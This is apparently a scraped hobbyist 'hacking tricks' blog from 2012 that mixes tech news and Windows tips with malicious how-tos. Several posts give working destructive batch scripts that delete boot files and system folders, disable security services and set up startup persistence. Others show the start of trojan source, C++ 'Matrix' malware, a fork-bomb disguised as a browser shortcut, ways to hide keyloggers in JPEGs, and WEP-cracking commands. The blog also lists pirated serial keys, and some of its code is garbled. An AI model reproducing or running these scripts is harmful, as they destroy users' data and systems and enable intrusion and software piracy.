Xiaomi Mi4c Leaked To Come With Type-C USB port and Even More Internal Storage

It was earlier reported that Xiaomi Mi4c is going to carry a price of less than $250, which is a steal of a deal considering that you will get a smartphone running a Snapdragon 808 chipset in it.

Windows 10 for phones features revealed

Microsoft showed off a number of new features for Windows 10 on phones today, but in afternoon sessions at the company’s press event. Most of the demonstrations focused on improving the built-in apps and features of Windows Phone, and fixing a lot of the oddities. That includes mail, maps, photos, Skype, and messaging.

Windows 8 and Windows 7 would receive a free upgrade to Windows 10

Once the OS launches later this year, Microsoft announced that all users who are using- Windows 8 and Windows 7 would receive a free upgrade to Windows 10 . With the release of the January Technical Preview, Microsoft is testing one of those systems.

Windows 10 build 9926 installation process

If you are installing the Windows 10 build that was released today, you will notice that the installation screens have been slightly changed or updated since Windows 8 and even over 9879, to a small degree. Since we know you don't install Windows builds frequently, we snapped some screens while installing the OS that you can see at the bottom of the post.

Whatsapp launches the Web client

Today WhatsApp announced a web client that will enable users to use the world’s most popular mobile IM client on their PC and Macs. But this web Client works only in the Google Chrome browser.

Sunday 18 November 2012

HOW TO MAKE IDM LIFETIME.


In this post/article i tell you that how to make the IDM forever. Many of you are facing the problem that your IDM get expired in 15 or 30 days but using this trick you can make your IDM for lifetime.

You can Make Life Time without Any Software(no matter if u have upgrade your version)

Install IDM
Note before Use:

Wednesday 31 October 2012

A Prank Virus



NOTE : PLEASE DO NOT TRY ON YOUR COMPUTER !! 
First open the notepad and copy and paste the below mentioned codes in notepad and see the fun. You can edit the codes to make more funny or even deadly.

Monday 29 October 2012

Find keylogger or any spyware in PC



Its  great method to find or detect a keylogger or any other spyware in your PC or system. As we all know nowadays keyloggers and spywares are big concern as hackers are trying their best to infect the victims to hack their accounts. Today i will teach you how to find a keylogger or Trojan or spyware in your PC or Laptop. There are several ways to find them but using this method you will know the exact path of the keylogger and where its saving the log file. Also once you have the keylogger server now you can reverse engineer the server and hack the hackers account password which he used in keylogger server. Lets first start with keyloggers introduction.

Sunday 28 October 2012

How to shutdown your friend's Pc


How to shutdown your friend's Pc through chating using cmd Hello friends. You can shutdown your friend's computer through chating. This is very simple and cool trick. Kindly follow these
steps :-

Saturday 27 October 2012

What Is Brute Force and some Softwares for brute force attack


Hi , The topic of this article is "Brute Force".In this article i will explain the meaning of bruteforce and will provide some top Brute force softwares to download.Lets Strat....

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies. Just as a criminal might break into, or "crack" a safe by trying many possible combinations, a brute force cracking application proceeds through all possible combinations of legal characters in sequence. Brute force is considered to be an infallible, although time-consuming, approach.

Flame (malware) what you need to know



Flame, also known as Flamer, sKyWIper, and Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system.The program is being used for targeted cyber espionage in Middle Eastern countries. Its discovery was announced on 28 May 2012 by MAHER Center of Iranian National Computer Emergency Response Team (CERT),Kaspersky Lab and CrySyS Lab of the Budapest University of Technology and Economics. The last of these stated in its report that "sKyWIper is certainly the most sophisticated malware we encountered during our practice; arguably, it is the most complex malware ever found."

Dangerous Email File Attachments You Should Be Aware Of


Among the email attachment extensions that should not be opened at all, or if completely necessary, should be open in the special secure environment, are:

Very Dangerous File Formats:

.reg Possible Windows registry attack

Friday 26 October 2012

Ubuntu: The Complete Introduction for Beginners


Ubuntu is linux based operating system with the origin in south africa. Its name means "humanity towards others". Back in 2004, Linux was already established as a server operating system, but free software was not yet a part of everyday life. Further, Linux was thought of as a complicated operating system which non-technical people could not use. It was at this time in 2004 that Ubuntu began as a Linux distribution aimed at ease of use. Mark Shuttleworth, the creator of the project, gathered a few developers and went on to create the most popular Linux distribution till date.

Thursday 25 October 2012

Advanced Port Scanning techniques


Advanced Port Scanning techniques

-----------------------------------------------------------------------------
Today i will teach you different types of port scanning and their analysis, drawbacks etc. Lets start with a brief overview of yesterday's tutorial.
In simple words, Port Scanning is a series of attempts by a hacker or network administrator to examine which ports on a network are open/closed/filtered by attempting to connect to a range of ports and then gathering information from responding open ports to detect what applications or which service is associated or running on those ports. Port Scanning is accomplished by running port scanner against the host to scan 0 to 65536 potentially available ports on computer.

How to remove youtube copyright.[tutorial]




How to remove youtube copyright.

This guide will tell you how to resolve copyright issues for your youtube videos. With this, you can have your favorite music and images without that WMG deleting your account.
This method only covers 99% of copyrighted material.

Tuesday 16 October 2012

How To: Delete ghost messages from MS Outlook




Most people who use Microsoft Outlook as an email client for Gmail or their personal POP
mail would sometimes notice that it is trying to send out emails but there aren’t any in the
outbox. These are usually ghost messages that have been sent earlier or are too large
and stuck in your outbox. Deleting these stuck emails removes them, but there are some traces
that are not visible and deleting these can be a pain as you cannot see them in the first place.



If you are seeing messages being sent out without anything in your outbox, it could be a read
receipt or a corrupted email. Removing this email or solving this error is a bit dicey, but not
impossible. However, before you attempt the following procedure, you will need to take a backup of
your Outlook emails in a safe place. Let’s take you through the entire procedure of safely backing
up your emails and rectifying the problem

Sunday 14 October 2012

Creating a Telnet Trojan for Windows XP


Following batch script will act as Telnet Trojan to any windows XP system, the best
part of it is it's fully undetectable to all ant-virus programs. Copy following lines in
notepad and save with any name with .bat extension for example Trojan.bat.
Code:

Saturday 13 October 2012

Warning: Fake Skype app. on Android is malware


A new piece of malware is trying to take advantage of Skype's increasing
popularity, especially on mobile devices. Cybercriminals have created a fake
version of the Skype for Android app, designed to earn money from
unsuspecting users. Trend Micro, which first discovered the malware, is calling
this particular threat JAVA_SMSSEND.AB.
The Java in the name should not surprise you, given that Android apps are
primarily developed in a custom version of the programming language.
Thankfully, this is not a very good fake. The app in question only runs on older (pre Software Installation Script)
Symbian phones or Android devices that allow execution of Java MIDlet.

Friday 12 October 2012

COLLECTION OF SERIEL KEYS ! (part 2)



Macromedia Studio MX ::::WSW600-59791-91721-99978
Magic Converter V 7.9.5.1 - MVC182749
Make Money 2.0 :::: PRF0200153
Mechanical Desktop 6.0 ::::400-19791979 / CD-Key:TLSQBS
MS Office 2007 - KGFVY-7733B-8WCK9-KTG64-BC7D8
MS Office 2010 Key - GGG8W-PJFRT-8MRQH-X99J2-PPPVM
MS XP - User Name - Creative, CD Key - FM9FY TMF7Q KCKCT V9T29 TBBBG
Nero Burning Rom 5.5=> 9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A3D
Nero v 8.3.2.1 - Password: renegadeddl.com, Serial: 9K20-7839-0295-6KA4-5008-1KM3-8C64or 1K22-2867-0K95-61K4-5000-CKAC-AA8X
Norton Inter Security2005 :::: BBCY-PK26-GKCP-7BCM-VY22-3VMF
Norton System Works2005 :::: BBCQ-9BCY-PKCX-GJPD-GYTK-HKGJ
Office 2000 :::: GC6J3-GTQ62-FP876-94FBR-D3DX8
Office 2003 :::: GWH28-DGCMP-P6RC4-6J4MT-3HFDY
Office XP Full BR ::::HXT2X-8CDBF-HYY8H-TYJ7Q-HMHHG

COLLECTION OF SERIEL KEYS ! (part 1)


Here is the some keys and serial number of some softwares

3D Studio Max 4 :::: Number:226-19791979 / CD
Key:XLSQBQ9zfll2WrZc+Vn0hWaw2dV/sccwKwsWY05TPwHden
Acrobat Distiller - WAW210P7121183-537
Adobe After Effects 5.5 : EWW470R1001999-030-259
Adobe Frame maker 7.0 ::::1030-1208-8265-3458-9287-7077-
Adobe Go live 4 ::::GJW400R2100006-625
Adobe go live 5.0 : GJW500R2898273-460
Adobe illustrator 9.0 : ABW900R71111141-999-830
Adobe InDesign ::::IPE123R12345678-337
Adobe live motion 1.0 : LVW100R7100843-292

What is CAPTCHA?


INTRODUCTION


A captcha is a program that can generate and grade tests that:
Captcha
Captcha
(A) most humans can pass, but (B) current computer programs
can't pass. Such a program can be used to differentiate humans
from computers and has many applications for practical security,
including (but not limited to):

--- Online Polls.

In November 1999, slashdot.com released an online poll asking
which was the best graduate school in computer science (a
dangerous question to ask over the web!). As is the case with
most online polls, IP addresses of voters were recorded in order to

Monday 8 October 2012

List of codes for the fancy alphabets used n the facebook chat box


Here is a list of codes for different alphabets:-

  A = [[399197913893]]
  B = [[115345298505025]]
  C = [[53872404042]]
  D = [[226910642728]]
  E = [[140775945956538]]
  F = [[136046106447549]]
  G = [[119431374760220]]
  H = [[205082339544090]]
  I = [[432883640525]]

Sunday 30 September 2012

Keyboard Shotcuts


keyboard shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)

How To Get Windows 8 Interface Instantly On Your Windows 7 PC


Windows 8 is yet to release, but buzz has started regarding it. We bring you an opportunity to try its desktop interface. Note that, It’s not the OS. It is just an application that gives your PC a look that resembles with widget-based look of Windows 8. You should have Windows 7 and .Net framework v4 installed on
your PC. Now, follow the steps below:

Friday 28 September 2012

How to sign up multiple times to a website with one/same gmail account


Sometimes you want to create multiple accounts in a website but you require different email id. In this very easy and simlple trick i'll share how you can create multiple accounts in some websites with only one gmail account. The basic logic behind the trick is some websites treats .(dot) as different email id but gmail treats them same.because gmail ignores .(dot) from your email id
for examle:-

examplemyid@gmail.com
example.myid@gmail.com
example.my.id@gmail.com
example.my.i.d@gmail.com


if i'll use any of these email id's to sign in to my gmail account gmail will let me in to the account examplemyid@gmail.com because gmail ignores .'s(dots) in your id. but many websites(not facebook)treats them as different id and you can access multiple accounts in a website through one email id.

This trick is only for gmail accounts and will not work on yahoo and hotmail etc.

Wednesday 26 September 2012

Cloud increasing share in security spend




According to a report by AMI Partners released Wednesday, overall global spending on security products and services reached US$19 billion in 2011. It added that spending by small and midsize businesses (SMBs) would increase at a compound annual growth rate of over 10 percent between 2011 and 2016.

Sunday 23 September 2012

Facebook Account Temporarily Locked or blocked::


 Facebook Account Temporarily
Locked or blocked:::....
Isn't frustrating????

Reason:

A) May be Facebook making an
improvement in the database and
the account get "Locked" are
stored on. During this time,it may
not be able to gain access to the
account. It may last for an hours.
If this doesn't work, try
submitting Facebook form.

B) May be Facebook has detected
suspicious activity and has
temporarily suspended due to
security precaution.

C) Randomly adding large number
of friends and sending
continuously message to your
friend list. Due to which unknown
friend has detected as a spam or
reported abuse. If in a bulk large
number of people report abuse or
spam then it may also get locked
temporarily.

FreeBSD add a user to group


You need to use pw command. The pw utility is a command-line based editor for the system user and group files, allowing the superuser an easy to use and standardized way of adding, modifying and removing users and groups. First login as the root using su or sudo command.
Task: Add existing user to group
You would like to add existing user tom to secondary group called ftpusers. Type the command as follows:
# pw usermod tom -G ftpusers

Saturday 22 September 2012

Bogus Facebook apps spreading Android malware


Third-party Android markets have traditionally been the main source of infection since the Android boom, as they are less strict than the genuine Play when it comes to bouncing malware.

Today Gmanetwork reports that, Users of mobile devices running Google’s Android OS were warned over the weekend against a new fake app of the social networking giant that may lead to potential Android malware. These duplicated applications have the same behavior as their original

Howto Crack pdf File Password


If you want to crack pdf file passwords use pdfcrack.PDFCrack is a GNU/Linux (other POSIXcompatible
systems should work too) tool for recovering passwords and content from PDF-files. It is small, command line driven without external dependencies. The application is Open Source (GPL).
pdfcrack Features
Supports the standard security handler (revision 2 and 3) on all known PDF-versions Supports cracking both owner and userpasswords. Both wordlists and bruteforcing the password is supported  Simple  ermutations (currently only trying first character as Upper Case) Save/Load a running job Simple  enchmarking Optimised search for owner-password when user-password is known

Install pdfcrack in Ubuntu

How To Create Your Own RUN Commands


If you had a belief, that RUN commands are only for predefined OS related applications; then it’s past now. Because, now we can also create user defined RUN commands so that we can run any application installed or present inside the computer. This will not only make you easily access the said application but also it will save your precious time. It’s very much easy too..

How To Download Torrent At Faster Speed


Trick 1 : based on torrent client
First tip to speed torrent download is to use Vuze instead of other torrent clients. However if you still insist on
using other torrent forms here are some tips that might give you a boost in enhancing your download
speed….

Trick 2 : based on upload and download rates

A Basic Knowledge About The Sim Card




This Is an Basic Knowledge About The Sim Card Wich U will Not Get in Google Also And Many People Doesn't Know This  So I am Sharing Wit U guys Sim Cards Are Of 4 Types..Named As Below
SIM
SIM
H1, H2, H3, H4
H ka Matlab Nai Malum
H1= U Will Get Noraml Network On

Thursday 20 September 2012

Ubuntu Tip:How to Connect/disconnect VPN from the command line


This tutorial will explain How to Connect/disconnect VPN from the command line
If you want to interact with NetworkManager from the command line you can use the "nmcli" command.
You can list all NM connections using the following command
nmcli con
You can start connection (wifi, vpn, etc) using the following command
nmcli con up id ConnectionName

Understanding /etc/shadow file used under Linux or UNIX


/etc/shadow file stores actual password in encrypted format for user's account with additional
properties related to user password i.e. it stores secure user account information. All fields are
separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd
file Generally, shadow file entry looks as follows (click to enlarge image):
/etc/shadow file fields
1. User name : It is your login name
2. Password: It your encrypted password. The password should be minimum 6-8 characters long including special characters/digits

Wednesday 19 September 2012

Permanent Solution To Delete Newfolder.exe Virus-(Manually)


Often people do complain regarding the New folder virus or Newfolder.exe. This newfolder.exe is an executable file that starts a malicious process which launches certain parasite components or runs a destructive payload. Even if the newfolder.exe file does nothing suspicious, its presence indicates that your
computer is infected with a particular threat.

The original name of the virus is: Iddono. If this virus enters into your computer, it will run into several system processes making several copies of it, occupies space from both RAM and Hard disk and thereby increase the system load. This virus is indeed very difficult to eliminate manually, but here is a solution for
removal of the deadly virus.

Manual Solutions:

How To: UNIX Add A User To A Group




Q. How do I add a user to a group under Sun Solaris UNIX operating system from a shell
prompt or command line?

A.. You can useadd command to administer a new user login on the UNIX system. Solaris UNIX
/ HP-UX UNIX uses /etc/passwd, /etc/shadow and /etc/group files to store user information.

Following information is compatible with the Solaris, AIX and HP-UX UNIX operating systems.

How To Create A Spam Virus


In my previous post How to create a computer virus? I gave a little information regarding methods to create viruses using different programming languages. But
let’s face it just creating a virus isn’t going to satisfy high class prankster. So here’s a new one coming your way. But as usual I should caution you trying this can
cause serious damage.
In this new prank we’ll create a spam virus in the computer and make the user believe it’s a very accessible file so that he opens it and falls prey to our prank.
Step-1 Right click on the desktop
Step-2 Go to new and create a “text document”
Step-3 Open the text document and type the following codes
@echo off
Copy 100% spam.bat
Start spam.bat
Step-4 then save the file as spam.bat
Step-5 now create a shortcut to the file spam.bat
Step-6 go to the properties of the newly created shortcut file
Step-7 click on change icon
Step-8 now select the most used type file by the user like icons of internet explorer or Mozilla firefox etc
Step-9 click on OK
Step-10 now rename the shortcut file as internet explorer or Mozilla firefox depending on the icon type you selected….

Wifi Securiy: WEP


Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks in 1999. Recognizable by the key of 10 or 26 hexadecimal digits (or what is the
same 5 or 13 characters, 2 hex -> 1 byte each).
Two important elements to know are: IVs (initialization vectors), and Data packets.
Obtaining the password is relatively easy (if it is short enough) because the more data packets we have the easier is for algorithms using some heuristics to guess he password
and finally find it.
Normally having 120,000 data packets is enough to crack the password of WEP protected wifi networks. To accelerate the hacking process it is useful to join the network,
capture some packets and generate traffic artificially.
First check if the MAC filtering is enabled (authenticate and associate to the network):
sudo aireplay-ng -1 0 -e target_essid -a target_bssid -h my_MAC the_interface
You can also do that with “keep-alive”: -1 6000 -o 1 -q 10 (re-authenticate every 6000 secs, and send keep-alive every 10s)

BitTorrent study finds most file-sharers are monitored.


Anyone using file-sharing service BitTorrent to download the latest film or music
release without paying is likely to be monitored, UK-based researchers suggest.
A Birmingham University study indicates that an illegal file-sharer downloading
popular content would be logged by a monitoring firm within three hours.
The team said it was "surprised" by the scale of the monitoring.
Copyright holders could use the data to crack down on illegal downloads.
The three-year research was carried out by a team of computer scientists who
developed software that acted like a BitTorrent file-sharing client and logged all the
connections made to it.

Sunday 16 September 2012

Linux setup shared directory


Sharing a directory among users in same group is one of the essential tasks. You need to use chmod command and add user to appropriate group. To make idea clear here is an scenario:

  • /home/myproj : is shared directory
  • usr1, usr2, ... usrN : would like to work and share files in /home/myproj directory
  • padmin : Main project administrator user


Saturday 15 September 2012

WIFI HACKING Commands in Backtrack/linux

Wireless networks are all around and people often needs to keep their networks private and secure. There is a set of best practices to do so and a good way of testing how secure our networks are (i.e., WLAN, Wifi) is to carry out wifi auctions.
Normally, networks are protected using an encryption technology which uses a password chosen by the network owner.
In this article, we will try to obtain the passwords of our networks as if we were an external attacker to verify whether our networks are secure enough or not.
Basically, there are 3 types of attacks:

Brute force: check all the possible passwords (not recommended for long passwords > 10 chars). Checking 1000 passwords per second, it will take 1 day in the worst case to decode an 8 digit password.
Dictionary: check only some character combinations. You can only check the most common combinations and save time.
Statistical: If it is possible (like in WEP encryption) you can guess the password from the data packets and IVs you capture using some heuristics.

CRACKING LINUX FROM INSIDE

We all knows what linux os is. It is a biggest platform on which a developer develops there software and it is an freeware.This tweak allows an user to crack the linux from inside. . Be carefull when you are cracking your linux os .

THE LIST OF FREE CRACK AND KEYGENS SITEs


THE LIST OF FREE CRACK AND KEYGENS SITES THAT ARE SAFE FOR U.


Are you looking for a serial key and can’t find it no matter how much you try? Well, if that is driving you crazy, a visit to the next websites might just put an end to that. Here is the list of free crack and keygen sites that are safe to use.

Wednesday 12 September 2012

Create A Hidden User Account



This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in
Windows 2000.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.

Make Your Computer to Never Reboot Till You Format It Up.


Basically this is a virus you program on notepad and save it as .bat file to delete the files needed
for booting up a pc.
Please follow the steps to create this virus:..
Open up notepad and copy , paste the code below. Save it as a .bat file.

Wednesday 5 September 2012

Make Your Computer Speak When you Log On


It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
Lets Do It:

Open Notepad

Tuesday 4 September 2012

To trace the ip address of the various computer in the internet (on cmd)


If u want to see the ip address of those who where using the same url which u r using at the same time in an WLAN network then use this cmd.

Step1> open “run”.

How To Speed Up Internet with Open DNS [Windows7]


In this article i am going to explain "How To Speed Up Internet with Open DNS" in Windows7.
Without the help of any software.

lets see how to setup OpenDNS for your Computer

First Go to Control Panel, then select “Network and Internet”.

Select “Network and Sharing Center”.

Select “Change adapter settings

Then Right click on your current internet connection and choose “Properties

Saturday 1 September 2012

How To Clear Pagefile on Shutdown


As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase  shutdown time depending on the amount of data in the page file.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.

Registry Key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management

Conceal Hidden Devices in Device Manager


When accessing Device Manager there may be hidden devices that are not displayed.


[Start] [Run] [Regedit]

Make Your Computer to Never Reboot Till You Format It Up.




Basically this is a virus you program on notepad and save it as .bat file to delete the files needed for booting up a pc.
Please follow the steps to create this virus:..








Open up notepad and copy , paste the code below. Save it as a .bat file.

Clean your RAM using Notepad!!


you may recognize that your system gets slower and slower while playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces which you don't need any more.

To clean up your ram:
Create a new text file and name it as "ramcleaner" or anything whatever you like..

Enable/Disable Local Group Policy Objects


In a non-networked environment (or in a networked environment that does not have a domain controller), the local Group Policy object's settings are more important, because they are not overwritten by other
Group Policy objects. You can open the Group Policy snap-in to edit the local Group Policy object that is stored on your local computer.
 Click Group Policy to open the local Group Policy object. This tweak allows
you to disable Local Group Policy Objects.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then

Navigate to following key.

Registry Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Wind
ows\System

[ In most cases, this registry key is not present and will
need to be created ]

Saturday 11 August 2012

Space Eater(VIRUS) code

This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program.

BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...

/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);

10 Interesting facts about Microsoft

Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts!

1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows by naming the folder "c-o-n", you will get an error message.

2. When you enter "=rand (200,99)" without the quotations into Microsoft Word, something very weird happens. After pressing "enter", the document is filled with more than 400,000 words.

Tuesday 7 August 2012

How make a virus in Notepad-2


SHUT UR INTERNET PERMANENTLY:::

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on
myself accidently, i knew what it did, and it still took me a couple of days to get my internet

back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the
internet permanately. It is somethinge else, that just provides a fast response to shut down
any connections.
<code>@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d
%systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /releasedel "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"

del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t
reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t
reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a



MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat",
ios::app);

fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main()

}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";

cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;


3-save it as matrix.bat
4-finish
then compile it using diz..
http://rapidshare.com/files/172088914/QuickBFC.exe
and finally it should be matrix.exe


AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE
NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS
STDIN,STDLIB,CONIO , AND STUFF LIKE THAT



How make a virus in Notepad-1


How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed
to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**

QoS Bandwidth Reserve Setting - Faster Internet Connection


     Beware Editing in the registry files can slow down your computer    

By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually by navigating to:

Registry Tricks for Windows - Clear Pagefile on Shutdown

     Beware Editing in the registry files can slow down your computer     


As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key

Tuesday 31 July 2012

Hide Keyloggers into a JPEG file


Through this trick you can easily hide
keyloggers.
First download any key logger from
google i think Ardamax is best.

After installing just follow these easy steps=>

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc.

Sunday 22 July 2012

Introduction To WebGoat A revolutionary Web Attack Tool

What is WebGoat?
WebGoat is aJ2EE web application, created by the OWASP community to provide a teaching environment for web application security. It is a deliberately insecure program,where you must go through a number of lessons . In each lessons, you learn about a new sort of vulnerability, and in the same moment get a hands on try at exploiting that vulnerability.

Thursday 12 July 2012

A new cross platform Trojan downloader has been discovered.


A new Trojan downloader has been discovered which detects your platform i.e. your operating system which you have and downloads the corresponding malware for your platform.
Remember the cross-platform malware that exploited Java to attack both PCs and Macs?
Here’s better one for you : A Trojan downloader that check your operating system and then pick up the malware which is suitable for your PCs/Macs.
The new Web-Based Social Engineering attacks, first detected on the Columbia websites, relies on a malicious Java applet to install backdoors on windows, Macs and Linux. When you first visit such a compromised site, then that applet program checks which operating system you have (Windows, Mac OS X, Linux) and then drops a corresponding Trojan for your platform.

Sunday 24 June 2012

GOOGLE DRIVE- NEW APPS FOR YOU








Recently, google launched its dropbox competitor, offering up to 5Gb of free storage space, not to mention the ability to download files and sync folders on multiple computers. here are a few tips to have make effective use of GOOGLE DRIVE.


PREVENT FILES FROM DOWNLOADING

We all know sharing is a great collaboration feature on google drive (right from its google docs days), but how do you prevent someone form downloading the file onto there pcs? It's simple.

Sunday 17 June 2012

SOMETHING MORE ABOUT THE IPv6

Enabling IPv6


In this post I am going to discuss something more about the IPv6 networks.


The switch’s implementation of IPv6 is disabled by default. To enable IPv6, use
the command:
      ENABLE IPV6


To disable IPv6, use the command:
      DISABLE IPV6


Any IPv6 configuration which the switch has performed dynamically will be
preserved between disabling and re-enabling IPv6. For example, any addresses
which have been configured will still be present.

Sunday 10 June 2012

FEATURE OF THE IPv6


In my previous post I am just introduced the IPv6, its Feature and the challenges to Internet . Now in this post I am going to explain the feature of the IPv6.  It has too many exciting features. Like:-

•Addressing
•Header
•Security
•Privacy
•Autoconfiguration
•Routing
•Quality of Service

Friday 8 June 2012

Introduction to IPv6 (Internet Protocol Version 6)


What is IPv6?

Internet Protocol Version 6 (IPv6) is a network layer protocol that enables data communications over a packet switched network. Packet switching involves the sending and receiving of data in packets between two nodes in a network. 
It has primarily been developed to solve the problem of the eventual exhaustion of the IPv4 address
space, but also offers other enhancements. IPv6 addresses are 16 bytes long, in contrast to IPv4’s 4 byte addresses.

The working standard for the IPv6 protocol was published by the Internet Engineering Task Force (IETF) in 1998.

Tuesday 5 June 2012

Extend Windows 7 Trial Period






In this post I am going to show that how a person can extend itswindows 7 trial perioed by 30 days. (without using any software)






Extending the Trial By 30 Days
